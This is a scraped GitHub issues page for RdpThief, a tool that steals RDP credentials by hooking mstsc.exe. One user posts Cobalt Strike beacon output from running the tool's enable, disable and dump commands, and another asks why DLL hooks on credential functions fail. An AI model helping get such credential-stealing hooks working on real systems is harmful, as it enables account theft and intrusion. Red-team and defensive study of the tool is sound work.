0x09al / rdpthief Goto Github PK

Running into an issue when Cobalt Strike injects the .tmp file, it crashes RDP. Has this been patched?

victim is a windows 10 (local admin user) - seems like the injection is never done. RDP is turned on, and I can RDP into the machine from another machine...

beacon> sleep 0
[*] Tasked beacon to become interactive
[+] host called home, sent: 16 bytes
beacon> rdpthief_enable
[+] RdpThief enabled

[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
[+] host called home, sent: 12 bytes
beacon> rdpthief_disable
[+] Disabling RdpThief
beacon> rdpthief_dump
[*] Tasked beacon to run: type %temp%\data.bin
[+] host called home, sent: 51 bytes
[+] received output:
The system cannot find the file specified.

I compiled the DLL (RdpThief.dll) and injected it into mstsc.exe process. It is able to hook ADVAPI32!CredIsMarshaledCredentialW but is unable to hook SSPICLI!SspiPrepareForCredRead and dpapi!cryptprotectmemory. I was able to verify this by attaching a debugger and looking at the assembly. Only the CredIsMarshaledCredentialW function has jump into the loaded dll. Any pointers on how do I debug this issue or have you encountered this before?

Are some DLLs immune to hooking?